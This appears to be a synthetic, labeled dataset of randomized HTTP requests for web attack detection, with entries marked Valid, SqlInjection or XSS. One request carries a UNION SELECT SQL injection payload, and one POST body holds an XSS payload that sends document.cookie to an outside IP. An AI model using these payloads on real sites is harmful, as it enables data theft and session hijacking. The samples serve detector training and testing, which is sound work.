GET /iAZ/XRE-XB.fMKwindow.openK7/nsR.XW/ChttpD3dropdivKN/EwinntoyuU/cet/xdropJdropSw3MeGopen1i/b2ht/escVs-@MHMg/YLzef9pE7Po/zDuI/oZ5skQiFl5.pl?lncthreV3e0=35519&fLQBcytXJ=9815616&ed2eimo=atdnr HTTP/1.1
Host: 142.79.187.33
Connection: keep-alive
Accept: */*
Accept-Charset: cp-936;q=0.2, x-mac-ce;q=0.2, iso-8859-8;q=0.4, big5, windows-1251;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=06
Client-ip: 246.244.195.20
Cookie: nbne6=rchhomeU;ecnPvu1rAmts=t&i;yv9llhgt3rteaib=t74FdDb;8oct=i7peOservicesA
Cookie2: $Version="9"
Date: Tue, 18 Jul 06 18:01:48 GMT
ETag: W/"s5xtQOfu_GURo_8I"
Expect: e3o9her=oCsile
From: erIrtmn@egw1d.net
If-Modified-Since: Mon, 25 Feb 08 03:45:26 UTC
If-Unmodified-Since: Sat, 31 May 08 23:21:26 UTC
If-Match: "Lv90q@RbxtG4MeZGMVr"
If-None-Match: *
If-Range: Thu, 29 Jun 06 09:28:39 CET
Max-Forwards: 736
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: NTLM YWJvdG5vbHJzdHNlbXJvZmlldTJkT2VnYWRSc1B5bzdlaWJodGNy
Authorization: NTLM b2Foa3RpbGNobnZuZXBpczFlbmVuam5ldG9kbmFNaW1rMW5h
Range: 94913-68559,806419-4130
Referer: /ideg/ykdZen/anuoniUP/ryeteat/e3udD.bin
TE: gzip;q=0.5,chunked
Trailer: Date
User-Agent: rnneat (to@v68; s7zk2tAZO; to.0V8; oRE7FluE; tyoDuYBC)
UA-CPU: PowerPC
UA-Disp: 9340,8339,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 1017x8120
Via: 4.8 44.133.48.131, FTP/0.2 4.86.8.49:795, 0.5 206.109.211.253
Transfer-Encoding: compress
Upgrade: utt/2.3, OloG/9.0
Warning: 261 www.tddrisan.shtml:4608 "amni" 
X-Forwarded-For: 127.43.236.207
X-Serial-Number: 7759023411175915
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24716
Start - Id: 19900
class: Valid
GET /iG58Qhfm47p.9F443azR/bwoMiqrt9/nistdinGtTLhP@LJWJR.sh?pmf00e5as=6064294&nonod=osmombir&tlsnoqscnp3t=sth&tuaohEcbie=t4w8w&tyeem9noryab4u=636679259&utmnrs6h7eol=eWgFqS&eanhuhntWDtt=9044&tco=nprephrcfurdaOt&es=4481 HTTP/1.0
Host: 82.24.204.94
Connection: close
Accept: image/jpeg
Accept-Charset: hz-gb-2312, x-mac-cyrillic;q=0.1
Accept-Encoding: gzip, deflate
Accept-Language: *
Cache-Control: no-transform
Client-ip: 255.56.103.210
Cookie: ddrtt4iwmrjfqe=ki$y>-;ptnstcnarXep7=2lse;7TeeIuoosixot=txgdk65;rei2Hrieoi6dawl=863771526
Cookie2: $Version="758"
Date: Sat, 19 Sep 09 11:45:20 CET
ETag: W/"xEUS.wID_BcjmUy_d"
Expect: 4nHnjel
From: cs2aCd@on2elbmso.org
If-Modified-Since: Wed, 27 Oct 04 18:39:45 GMT
If-Unmodified-Since: Thu, 27 Aug 09 07:55:14 UTC
If-Match: *
If-None-Match: "rYytp8YxkcM_3M2U8oa"
If-Range: *
Max-Forwards: 66
MIME-Version: 0.4
Pragma: 6ca='h'
Proxy-Authorization: Basic ZWxZekFhYXU6bnFpRXlwNw==
Authorization: Digest nc=4ACBf4C7
Range: -8804
Referer: /1ehtuyc.mspx
TE: trailers,gzip;q=0.7
Trailer: Connection
User-Agent: uSF5rZq http://www.rovttir.org
UA-CPU: PowerPC
UA-Disp: 611,1277,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 205x6501
Via: HTTP/0.7 www.ip1nius.tiff, eeda/4.3 www.HmmWi.html
Transfer-Encoding: deflate
Upgrade: nofnHJ/3.3, Eo0/1.9, eex/2.7, dloapf/3.8
Warning: 431 103.132.199.19 "edesstaoetncjym5olrr" 
X-Forwarded-For: 41.54.85.67
X-Serial-Number: 11565952861690
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19900
Start - Id: 11956
class: Valid
GET /alatmSe/eYDMY/tj80f5rzplry60di/ORrtyoE/KjZ7/sMH4ZgBhculw7/eYi/bhb/yCJus-0y_WaAOx5bk-/rhncdhdttthtoe9e/acy-rfvO.yQIgD3kPQS/dY4A@mDwBL3r-.css?u2zh=+ah%5DlueEstywinnta6z&xsnnhS=4777461&eolwti7n=etm&mn5eRfhe3=86&X__position=rrA3usid7gF&OEAl3grm0dv=twaaencrie&uouqO71amA0hG=winhuarsodaeaNzhi&4rnhdcfl40z=5neeireplaceqaechophpprocessing-instructiont%29&oiyjeyHom=85993&regeiciiOuoh=635985399&de=29670&oHnseecahte9L=205361 HTTP/1.1
Host: www.nnDbdic.org
Connection: close
Accept: application/*;q=0.6
Accept-Charset: *
Accept-Encoding: gzip;q=0.5, gzip, identity;q=0.9
Accept-Language: *
Cache-Control: no-store
Client-ip: 206.94.92.96
Cookie: bae7emiea7aost1=Xee;runi=086;dorrioyEsmms=d~emochaa;nSjieO=l6V5e;lehAmt1otumtSgt=au;nehnnsasolthh=hns
Cookie2: $Version="640"
Date: Sun, 10 Dec 06 10:41:47 UTC
ETag: W/"U0qku8ZV_i4ChQVBYar"
Expect: 100-continue
From: RoReztii@imT2.gov
If-Modified-Since: Thu, 25 Mar 10 01:49:55 GMT
If-Unmodified-Since: Fri, 08 Sep 06 24:55:33 CET
If-Match: "2n2_@0JX0ChPvuln"
If-None-Match: *
If-Range: "Wyl8pYyo1RylgKcR"
Max-Forwards: 39
MIME-Version: 8.1
Pragma: n4='tei'
Proxy-Authorization: Digest nc=DEd6BEef
Authorization: cwexd8 owwn=Eevlse
Range: 69-9009
Referer: http://www.dSeYpi.de/Nnatl/9nms/coVm/t2ht/lvsxw.rar
TE: gzip;q=0.5
Trailer: If-Modified-Since
User-Agent: SdpDanda1lt
UA-CPU: PowerPC
UA-Disp: 664,211,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 165x3870
Via: HTTP/5.0 36.191.63.162
Transfer-Encoding: deflate
Upgrade: Ctgnlx/6.7, sct/7.1, 1Se98/3.9, cbmeeR/3.3
Warning: 781 www.doaiO5.html:2 "eedAwnx0wtoeziimEee" "Wed, 27 Jun 07 16:44:22 UTC"
X-Forwarded-For: 176.49.69.217
X-Serial-Number: 7861742222563
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11956
Start - Id: 10074
class: Valid
GET /nt1mreeiel6ewe/iik0ggrekbfyamgvhla/seayaeOae9ynohntatat/3xtermhZfqqNGs/oPALW/5idheeaolhqchda/aso.js?4e=iht&oR=e%3De&rmuiua7=est6S.b&YYservicesi16Og=hhb&YyZi9img=iV2eQLM&sinensao=%3B+nsd&hwnc=2&httpsmochaNsnekDX=6405&1f5eaajnz=358&osteuoe=7i2dCqodatoh0%3C&Qw7linkVkQniU-=vGWBzk&bm=s27HH.RZdSDX HTTP/1.0
Host: 210.87.223.193
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: iso-8859-7;q=0.9, x-mac-icelandic;q=0.1, windows-1254, x-mac-greek;q=0.2, iso-8859-5
Accept-Encoding: identity;q=0.1, compress, gzip
Accept-Language: Psiy6s-5oraoam;q=0.6, esnaua-Adcab
Cache-Control: no-store
Client-ip: 137.46.99.85
Cookie: ohoIaf4ewh=2821656854;NeTeat=5
Cookie2: $Version="231"
Date: Thu, 01 May 08 07:55:37 GMT
ETag: "yZwKRjevrp-4Czu_o"
Expect: nEndi
From: aemYeste@u736nnw.biz
If-Modified-Since: Wed, 16 Aug 06 11:04:48 GMT
If-Unmodified-Since: Thu, 05 Feb 09 13:19:40 GMT
If-Match: *
If-None-Match: "MaCRvLK@d6P6l5Wxs"
If-Range: "q9P@Ud4fpBkRNq7S"
Max-Forwards: 5855
MIME-Version: 4.0
Pragma: wEn=lsfr1O
Proxy-Authorization: Basic cmViMWxvdGE6aHhSTA==
Authorization: Digest nonce
Range: 1978-3,68-
Referer: http://ccraa80.net/bCennao/uoo4siv/hedNlyx/ner3d.jpeg
TE: deflate,chunked;q=0.4
Trailer: Via
User-Agent: iEWDNngEn http://www.6ue7tf.it
UA-CPU: 68000
UA-Disp: 046,3752,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 6453x8240
Via: 4.1 149.163.11.94, FTP/3.7 www.aaOb.htm
Transfer-Encoding: gzip
Upgrade: m7oln/1.1, eees/3.7, 8shd/5.6, i8enT/6.8
Warning: 334 201.54.73.174:7 "ostm1" 
X-Forwarded-For: 189.69.165.224
X-Serial-Number: 9719110193
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10074
Start - Id: 26212
class: Valid
GET /TNydlrtyao/n0fM0a/pyfaepojloSijrdds/v4jCBXiy-.css?uen9arotre0zf7d=wpWe&314va=e2OW&JREgUMnph-Oy=kpsoY&BnPMn=nreh7&ren6wcg3solrHgi=5WGJaG&qi1=76 HTTP/1.0
Host: 51.158.25.229:80
Connection: tot9
Accept: video/mpeg, audio/x-wav;q=0.2, audio/x-wav
Accept-Charset: *;q=0.3
Accept-Encoding: compress
Accept-Language: *;q=0.7
Cache-Control: min-fresh=732
Client-ip: 237.86.185.182
Cookie: 3PJ.oWYblogobjecti7=efz;l7rain5bs=nlunxY;LaInnnEe=6214;ctoean7ezoeft=7132612;a0mdatibae1nB4=8AZ.xSipK@PC;tk=sa_HkuZ@
Cookie2: $Version="29"
Date: Sun, 18 Jan 04 12:05:12 GMT
ETag: W/"rFsl@N.AdapEJzmyc4"
Expect: waeucNpB
From: ts1wUaS@wxeiemthe.st
If-Modified-Since: Fri, 14 Aug 09 02:07:22 UTC
If-Unmodified-Since: Mon, 02 May 05 23:12:08 UTC
If-Match: "u0VGMfFep54JiDg2Av"
If-None-Match: *
If-Range: Sun, 23 Aug 09 09:07:37 GMT
Max-Forwards: 2
MIME-Version: 6.7
Pragma: teg='eyaa8'
Proxy-Authorization: NTLM Z2NlSWx1YW1zaGQweGllY2UzYmNxeWlXc3hubTZucml0WnRUeWltZQ==
Authorization: Basic ZVNuanVleDpEZWZw
Range: 485874-76550,627253-,688763-0608
Referer: http://sewe.uk/nrcsl/i5nf/aaaor5.mdb
TE: chunked;q=0.5
Trailer: If-None-Match
User-Agent: s-.HrGa http://www.toutco.biz
UA-CPU: PowerPC
UA-Disp: 1270,703,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 733x086
Via: 5.3 www.Oaaot.gif
Transfer-Encoding: deflate
Upgrade: fR2SsR/5.3, 3lie4s/1.4, jotr/3.5, kw3/5.8, eyeh/6.5
Warning: 403 www.1ernaeea.tiff "sB1ntt" "Thu, 29 Jan 04 19:12:54 UTC"
X-Forwarded-For: 248.73.239.249
X-Serial-Number: 2106773576
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26212
Start - Id: 22039
class: Valid
GET /Ze/wVi/nrtj_Rwgfhn/0e0ynsho/aasenoe3mh8tit/gW3UHiIVvarB/O2mBuXIIgNa5X/a01IQJeesFWaTpExFkr/eE88yNr2SX/trjesrtdmiiis/rDypetdbee.css?teho=hnrqexChececerdzuh&io=2292&hiewig=irFSeRoeu9otusgac&tex=troaiy&le0mtf=d3dexvchqhexoxeM&y9UO=8940 HTTP/1.1
Host: www.tdsioeirG.cz:12
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: dnuh-w;q=0.2, Ll0aIhe-ito, eru-ane;q=0.5, pAo-oo, oeaoote-tfs8oetz;q=0.5
Cache-Control: min-fresh=8129
Client-ip: 254.122.123.9
Cookie: ps=oooa$;eilp= s ls;edrjNxafo=5tssoGk;itRjvetnne3=6420074;dnnat2=yGkk;ae=j
Cookie2: $Version="2"
Date: Wed, 28 Oct 09 03:06:52 CET
ETag: W/"YUTTAJyHi11ufSM"
Expect: 100-continue
From: rnoHSnss@agsartc.de
If-Modified-Since: Tue, 23 Aug 05 15:44:40 UTC
If-Unmodified-Since: Sun, 26 Aug 07 24:09:59 CET
If-Match: "2GQL-NpEy06xCX-ZE-@H"
If-None-Match: "cuERd4IEVKzaiEP"
If-Range: Thu, 05 Oct 06 02:52:26 CET
Max-Forwards: 7862
MIME-Version: 1.6
Pragma: t6ww='e'
Proxy-Authorization: NTLM NmdkZURlYmZoZW90emdNdHpkcmVmN3NoaWhzeWlvdHJ0
Authorization: Digest username="eHnsat"
Range: 5-448267
Referer: /dssht/eLbdgbch/scud.jpeg
TE: deflate,gzip;q=0.9,deflate
Trailer: If-Match
User-Agent: Mozilla/3.2 (compatible; MSIE 0.2; Mac OS X; otme6sbtLp)
UA-CPU: x86
UA-Disp: 077,354,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 4794x4062
Via: bitsj2/9.4 74.201.227.250:5463
Transfer-Encoding: owhu
Upgrade: p9tI/9.2, 8r9o/6.5, aeyn/9.3
Warning: 103 www.Krm9fhll.htm "rrsU3rWt9etr" 
X-Forwarded-For: 215.72.82.69
X-Serial-Number: 10148622161169
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22039
Start - Id: 41987
class: SqlInjection
GET /iczJhSHFETHkW0zt/.3O60dMP11/ozs0gjiJhtMuCWJvnz/eer/ecae0m5ere/ih5orbnv9teulhmca.swf?ulb4byrmTl=%7Esr+sobject&yann=89884912&tei2iRdUcas0seo=dseerwkqansttl2&e8ee6n=%27%29+UNION++++ALL+SELECT+++++7rlelt++++%2C+++++Eanaents+++%2C+8t+++FROM+++++ie+WHERE++++id++NOT+IN+++++%28++++%27usbnniw%27%29+++AND++++ppk+++NOT++IN++++%28%27zDteHMda4s%27++++%29++AND+++++%27%27%3D+++%27&uovp=oarQ%3B0ro%5Cira&5dlDKcAQYkIh=579 HTTP/1.0
Host: www.oegF62n.biz
Connection: 4idtO6
Accept: audio/*, image/*;q=0.8
Accept-Charset: x-mac-ce, x-mac-greek
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 41.133.176.17
Cookie: hcg=5375748072
Cookie2: $Version="9"
Date: Sat, 29 Apr 06 11:53:05 CET
ETag: "H-wtGNRWTakDfVw7"
Expect: taus=aiyn
From: Iyirabt@mar7tEeeb7.de
If-Modified-Since: Mon, 24 Nov 08 05:30:00 GMT
If-Unmodified-Since: Thu, 01 Apr 04 13:10:29 UTC
If-Match: "bbdsJU97bl07UuCXVqs"
If-None-Match: *
If-Range: *
Max-Forwards: 4843
MIME-Version: 0.8
Pragma: otniwcif='n7l'
Proxy-Authorization: Digest uri=http://Ih9gc.net/soss.txt
Authorization: Basic Z3ZzbmN0ODp5dndrYWhpYw==
Range: -728027,84041-8,736156-
Referer: http://www.Hl1ioh.net/iwiec.js
TE: chunked;q=0.7,chunked
Trailer: Accept-Charset
User-Agent: Mozilla/5.7 (Machintosh; U; PPC Mac OS X 5.3; La-sn; rv:9.5.3) Gecko/24115525
UA-CPU: Sparc
UA-Disp: 8277,101,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 8709x899
Via: 6ucKLt/1.7 www.betno.jpeg, FTP/6.9 219.111.145.75
Transfer-Encoding: gzip
Upgrade: tsem/9.8, icrMn/2.4
Warning: 567 141.96.99.110 "rih65mresz2g" 
X-Forwarded-For: 88.3.128.18
X-Serial-Number: 772384141
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41987
Start - Id: 29011
class: Valid
GET /pe1huwOTostCumgeAiy/h_jR@ZaYrnmLXBnX4.js?7C2C7JaiM=isi9eBNReQ3q&1mochatv-aY=7dI8tTLgOt&b1souedra7qe=irtps&1e7cz=o3ko9ccsieer9atrN&Nhe=56801449&EohltLbe6sniot=styleie&iaO1fsy=d%5D%28otts4l%26y%5Dvarree&l0cJllocationX=inesa&ro=%7E%3D4&ynzF8AWwvI=eMM--tEpK_O HTTP/1.1
Host: www.ago4hy.st
Connection: close
Accept: audio/*;q=0.6
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 36.180.210.251
Cookie: ecechg=795;1E2c3mwp-=3uRwDwhyzktieC;.oEPwp-4oMG=8|eselect;ii=572026;7xrtonMasNrU=1225982
Cookie2: $Version="422"
Date: Wed, 06 Dec 06 12:39:22 UTC
ETag: W/"5G1CsBdFle22Xtr"
Expect: 100-continue
From: e8z2rsr@hhsecdIax.be
If-Modified-Since: Mon, 20 Nov 06 18:56:53 UTC
If-Unmodified-Since: Fri, 30 Dec 05 21:56:02 UTC
If-Match: *
If-None-Match: "MGME.zGjFdDRsbpu"
If-Range: *
Max-Forwards: 1
MIME-Version: 2.4
Pragma: uWnNk=sqc
Proxy-Authorization: Basic b29pdDo0dnQ2ek9t
Authorization: Basic YWhhaWFuaHI6Z25tcWVu
Range: 2318-,-7
Referer: http://www.en3sh.net/nsbdree0/hrer6ozd/efu5emna.exe
TE: trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/3.3 (Windows; U; Windows NT 9.1; ds-tw; rv:4.2.9) Gecko/37163314
UA-CPU: x86
UA-Disp: 023,422,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 694x8428
Via: 6.9 8.251.112.210
Transfer-Encoding: compress
Upgrade: rpq0t/1.3, h5yess/6.6
Warning: 848 www.1zbi.js "tteneag" 
X-Forwarded-For: 234.170.143.94
X-Serial-Number: 055751373307057
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29011
Start - Id: 18156
class: Valid
GET /X9IW_hKy8vhy/dvg3Rti/1ZInjcOIi2/eUjwX6mYSk3XQ/bM/7MwLZRS@/rRZADiz7gvkPVLn.2/nobjectmE9BO/t1nFfNnOXuC@I.M@Q/t1aTae.html?ni5yiS1oh=9empprdaaahcdM&Owetmmmehaipoct=3843&slElmo=+nsHP&vlUo1ysrRah=lZXSLtFkx&CZDPnaPGnetcatpI=542&5z=30&LcOXk0Euw=%3C+rp%27+Oq2t&lM3eposnt=oe+havingc+rotdas&Eet4OfshoRit=2cl7aP+c%5Bb%5Boratsqn0 HTTP/1.0
Host: www.h0sp8ruo.it
Connection: keep-alive
Accept: application/zip, image/gif, application/*
Accept-Charset: *;q=0.3
Accept-Encoding: deflate;q=0.8, compress;q=0.4, gzip, gzip
Accept-Language: 2i0wpy-t, 3r-oa;q=0.0, 6-teSYiEtr;q=0.4
Cache-Control: max-age=5
Client-ip: 187.103.207.94
Cookie: PD4MHxtermsock_streamx7b5=ietd;stuaRteesal=5lftpia;iRans2o=ot@;p9lohlaectptea=aas-ii)jenbhldrop>ettl%u;degto1v=sperFrmefA2tg
Cookie2: $Version="841"
Date: Sun, 19 Apr 09 03:41:17 GMT
ETag: "4OnTg4GXhOJaxReCc"
Expect: 100-continue
From: 96bse@Sia8e.it
If-Modified-Since: Mon, 29 Nov 04 11:48:23 CET
If-Unmodified-Since: Thu, 27 Mar 08 10:23:48 UTC
If-Match: "3K9nq_6nYSJ-PHZfNoN"
If-None-Match: "3X6sZ72WcQXepfY"
If-Range: "u7GM7tU8iGoO0rVQ"
Max-Forwards: 67
MIME-Version: 0.4
Pragma: e5='Llrye'
Proxy-Authorization: Digest qop=sttoy
Authorization: Digest opaque="etaowik"
Range: 875436-348852,-818
Referer: http://onln.cz/pmrseai/lienecf.png
TE: trailers,trailers,gzip
Trailer: Proxy-Authorization
User-Agent: taegaecdu7
UA-CPU: 68000
UA-Disp: 2033,9785,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 3922x0648
Via: 1.1 33.27.147.237
Transfer-Encoding: egeNt
Upgrade: receba/6.4, n0ete/3.0, 8dtoRs/5.6, voa/4.8
Warning: 963 216.51.91.254:266 "gatunof" "Thu, 18 May 06 14:03:37 CET"
X-Forwarded-For: 47.138.63.112
X-Serial-Number: 21129432693089718
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18156
Start - Id: 24008
class: Valid
GET /4object_O/u6WVu.mdb?xp_7DIwindow.openSwi=2BV&2WltlZT1=Q&egtntxlhyaea=874352&seit=o6eRohs%24r&1V7gJ6window.openZ3=nGEaer0xtermpa7+amu&mtbryi=wxrM&Pug1ArKXmsrz=ow&aidm=7909902&aenompea=hsyotgtllcoawhsec&EhW-iAXexinmF=aM6A&ettteeiax1dnr=w4a0agDEPD&Shtkt=%7Cyp+zneng%3BotmppC%5D&EFxy=xtermd9Fl0z&qeieevoOa=08382&vq=uBG1KQA HTTP/1.1
Host: www.ecOkh.ch
Connection: im30
Accept: application/x-tar;q=0.8, video/*
Accept-Charset: iso-8859-6, x-mac-japanese;q=0.8
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: max-stale
Client-ip: 164.142.186.27
Cookie: 7opcae=oN8q;Kqscript@u1D=passwd0|;lutei=mJE3lhGXkV7l
Cookie2: $Version="905"
Date: Wed, 09 Jan 08 04:59:04 CET
ETag: W/"tsyvamE5kv4yCK-6"
Expect: 100-continue
From: rESt9@oraehs.ch
If-Modified-Since: Thu, 21 Dec 06 10:53:08 UTC
If-Unmodified-Since: Sun, 11 Oct 09 18:10:08 GMT
If-Match: *
If-None-Match: "ajTXqIV@_t7NAwHqK"
If-Range: Thu, 23 Jul 09 18:00:40 UTC
Max-Forwards: 51
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: igR7 Bebu8i=uedenee
Authorization: NTLM ZWxHWXJ5dGE5Z2RsU2FtZWhzN3Q1ZGpydWsxaW50N3U=
Range: 57-083666,74376-4577,088-
Referer: /Itm6oef/xsezr/wadsU/eBbrl/smldr.mdb
TE: trailers,gzip;q=0.9
Trailer: Date
User-Agent: Ad8ffastt
UA-CPU: PowerPC
UA-Disp: 4414,5382,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 796x257
Via: deioro/9.0 www.epachus9.gif, 1.1 www.udrttoee.htm, wSwejn/9.0 www.arome.tiff
Transfer-Encoding: identity
Upgrade: berd/1.6
Warning: 468 102.124.44.220 "QreG49doDa" 
X-Forwarded-For: 218.161.129.191
X-Serial-Number: 54119
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24008
Start - Id: 12749
class: Valid
GET /Airs2ts/mUscRLXI_4v/a0siQ67hcHU3y/binIFulEpWtyFG/5yhfos/9Ebu_s7wl.asp?Rfih=454632&wtrbddapbg2per=2175876331&eite=seu+&eem7n7p=msmne3t8dwbnuyMng&ewh=dbe&hofaWdq=2738500&oCotm=freinenTee8ode&4tToijlr7me=apositionadminorsifs9r%26-p&on9mii7dixs=06&Uopen.MB=k%29n&_c912gdmselect=seinsertt&rcqtgiitbvajo=s%7CtgturtB&brh8ne0jrUo2u=69&rrtcoOdsrueti=061963 HTTP/1.1
Host: www.zitdis0iow.fr:0431
Connection: close
Accept: */*
Accept-Charset: x-mac-hebrew;q=0.4, hz-gb-2312, x-mac-hebrew, utf-7;q=0.7, x-mac-icelandic;q=0.4
Accept-Encoding: compress;q=0.7, gzip;q=0.5, identity, deflate;q=0.7, gzip
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 106.56.170.223
Cookie: @t13u7Uk6=a9reh;lszr=eK2@HO5zZ0
Cookie2: $Version="599"
Date: Sat, 15 Dec 07 12:43:33 CET
ETag: "EIM@o9wCtPgYYYdAk"
Expect: 100-continue
From: rogePgt@vggn.st
If-Modified-Since: Fri, 02 Dec 05 20:24:58 CET
If-Unmodified-Since: Wed, 24 Sep 08 19:25:13 GMT
If-Match: *
If-None-Match: "t13gmVtvWO@GOAn"
If-Range: *
Max-Forwards: 187
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: stgyt iacOt=tu9k
Authorization: Digest nc=A23467be
Range: 23407-76
Referer: http://nseao3.com/isyeaq/nnnsis2b/tiEpO/hoqosatA.cfm
TE: chunked;q=0.7,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/9.4 (Machintosh; U; Mac OS X 9.2; bt-9o; rv:6.2.2) Gecko/07976323
UA-CPU: MIPS
UA-Disp: 8183,952,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 596x179
Via: HTTP/3.1 182.89.231.0, 9.2 11.186.89.24, 4.6 www.rsOomg.jpg
Transfer-Encoding: identity
Upgrade: al9/4.2, fue/6.6
Warning: 595 www.sEdyesc.html:10 "ssEsgqu" "Mon, 08 Sep 08 09:37:27 CET"
X-Forwarded-For: 227.241.172.23
X-Serial-Number: 70965960984740249888
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12749
Start - Id: 46838
class: XSS
POST /rapw8AudgDXn@AePbUg/dYCCnGdvsMTT0KCfj0/iz/St9hKTpIrR7.htm? HTTP/1.0
Content-Length: 404
Content-Language: hjrii7p4,rae
Content-Encoding: gzip
Content-Location: http://www.Nsa42o5.org/csbn1/etote/ne3isa.mpeg
Content-MD5: dGRmdGNrc3RsYXRpbHJ0YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 06 Jan 07 10:57:53 GMT
Last-Modified: Wed, 04 Jun 08 06:01:50 CET
Host: 77.208.20.55
Connection: oDllmHg
Accept: image/gif, audio/*;q=0.1
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=63064
Client-ip: 169.136.109.14
Cookie: csrtl5r=n7jchildh;dgtfeecvaiid=81677145
Cookie2: $Version="83"
Date: Wed, 08 Oct 08 23:51:36 CET
ETag: "4y65XizpsvxblzyDhxg"
Expect: 100-continue
From: fassgdh4@tikal0.com
If-Modified-Since: Thu, 19 Aug 04 19:25:53 CET
If-Unmodified-Since: Mon, 05 May 08 20:40:51 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 13 Jan 10 17:14:26 CET
Max-Forwards: 6
MIME-Version: 5.0
Pragma: ci=o7xr
Proxy-Authorization: NTLM Y2xlb0RhYWloY2Vsbm50dG5oZW94ZWV0MHNveWllTW84bm5pajhmcjdyb3Q5
Authorization: Basic ZGdyZ3ZmcTpzZ2x0bQ==
Range: 04-141477,-19
Referer: http://www.trho.biz/haeC/pnra/ieodonn/nEqdwo/44hxb.asp
TE: trailers,gzip;q=0.9
Trailer: Referer
User-Agent: 9dle7gcxae (r5XVmt5GFQ; mA1hj@)
UA-CPU: Sparc
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 818x5674
Via: HTTP/5.6 www.hertf.html:88606
Transfer-Encoding: compress
Upgrade: ccSen/7.1
Warning: 515 www.wruorr.jpg "seuttb" 
X-Forwarded-For: 67.114.213.31
X-Serial-Number: 072274181665
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

3MeOb5mnceizty==xdj&9Wrort2tu=irfh6u4l=wh&mlocationvwED=<div    style   ="    background-image: url(javascript: [window.open('http://223.5.161.177/velain.mspx'+document.cookie);]);   "    >&6xoSonewrhribct=hsei5ayeidrinthite&lyecuem=47243722&@.Bwindow.open=33&3linkW--Tinputy.KD=581&wt7adrwmtrpe=m7hZE8u&krma2gpFaccess_log=065609&rhmfxnHrxclxs=teta4deiyabz

End - Id: 46838
Start - Id: 23049
class: Valid
GET /tveed6gmtnshAkes/o8aif2rhaHcqv/ciltntemluld9toj/vbscript7hhmbinVn/f7i2u9sttd3otd5n04l7/N9NFig/emUD/nf9hQLHg/53TsFftpr1b/seJnuBEaltuLes/poeeygrTo9wfhr/5I@uZn5TBZpAGMu.shtml? HTTP/1.1
Host: 222.215.96.167
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: se-dn;q=0.6, Oeo-cteooe;q=0.4, osqs-Ae
Cache-Control: no-store
Client-ip: 213.187.223.93
Cookie: eVusceauimcls=9019
Cookie2: $Version="511"
Date: Fri, 23 Sep 05 06:05:03 CET
ETag: "kRYggY4wIofP4bRKh@"
Expect: 100-continue
From: sAahmw9m@oemr3xo.uk
If-Modified-Since: Wed, 21 Jan 09 22:52:50 CET
If-Unmodified-Since: Sun, 31 May 09 03:20:26 CET
If-Match: "xaTBOO.oV0E6ERTS"
If-None-Match: "af1W1jY8IogDiiG3ny"
If-Range: Sun, 21 Jan 07 17:52:21 CET
Max-Forwards: 5
MIME-Version: 2.9
Pragma: 5=lvjSp
Proxy-Authorization: aeTei e5umtiha=e96omtou
Authorization: NTLM cjFtQm1jRDRlZWJmYjdvc2hydGxpOWV2YVFiZXhzaHRlcnRuN2Y3ZG9jdw==
Range: -41
Referer: http://sYiAa.uk/pnrtia6v/7sfHetr1.aspx
TE: chunked;q=0.7,chunked,trailers
Trailer: Authorization
User-Agent: Mozilla/8.6 (Machintosh; U; PPC 8.5; ea-oh; rv:5.3.5) Gecko/38930715
UA-CPU: x86
UA-Disp: 8779,521,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 6076x9120
Via: 7.0 www.Ewny.htm, HTTP/3.0 www.sr5e.htm, HTTP/7.4 www.tdmuh.gif
Transfer-Encoding: gzip
Upgrade: hjG/0.3, nce65/6.8, e8Uee/4.6
Warning: 007 www.oobensO.tiff "sn6eP" 
